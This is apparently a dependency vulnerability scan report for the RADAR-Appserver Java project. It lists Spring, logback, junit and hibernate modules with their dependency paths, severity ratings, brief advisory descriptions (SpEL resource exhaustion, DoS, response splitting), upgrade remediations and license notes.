Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted SpEL expression.
Remediation
Upgrade org.springframework:spring-expression to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Denial of Service (DoS) when providing a specially crafted HTTP request.
To be vulnerable, these conditions must all be met (which is usually the case for applications dependent on org.springframework.boot:spring-boot-actuator):
The affected application uses Spring MVC or Spring WebFlux.
io.micrometer:micrometer-coreis on the classpath.An
ObservationRegistryis configured in the application to record observations.
Workaround
This vulnerability can be avoided by disabling web observations: management.metrics.enable.http.server.requests=false
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-web to version 6.0.14 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to HTTP Response Splitting via the Content-Disposition header where the filename parameter value could contain non-printable characters, causing parsing issues for HTTP clients. An attacker can cause the download of files containing malicious commands by injecting content into the response.
Notes:
This is only exploitable if the header is prepared with
org.springframework.http.ContentDisposition, the filename is set viaContentDisposition.Builder#filename(String, Charset), the value is derived from unsanitized user input, and the attacker can inject malicious content into the downloaded response.The vulnerability was also fixed in the 6.0.29 commercial version.
Remediation
Upgrade org.springframework:spring-web to version 6.1.21, 6.2.8 or higher.
References
medium severity
- Module: ch.qos.logback:logback-classic
- Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4, org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32
Dual license: EPL-1.0, LGPL-2.1
medium severity
- Module: ch.qos.logback:logback-core
- Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4, org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-starter-logging@4.1.0-M4 › ch.qos.logback:logback-classic@1.5.32 › ch.qos.logback:logback-core@1.5.32
Dual license: EPL-1.0, LGPL-2.1
medium severity
- Module: junit:junit
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › com.google.firebase:firebase-admin@9.8.0 › com.google.cloud:google-cloud-storage@2.64.1 › com.google.api.grpc:gapic-google-cloud-storage-v2@2.64.1 › junit:junit@4.13.2
EPL-1.0 license
medium severity
- Module: org.hibernate.common:hibernate-commons-annotations
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0 and org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
LGPL-2.1 license
medium severity
- Module: org.hibernate.orm:hibernate-core
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0 and org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-core@6.1.7.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.orm:hibernate-core@6.1.7.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.hibernate.orm:hibernate-core@6.1.7.Final
LGPL-2.1 license
medium severity
- Module: org.hibernate.orm:hibernate-envers
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final
LGPL-2.1 license
low severity
- Vulnerable module: org.springframework:spring-context
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6
-
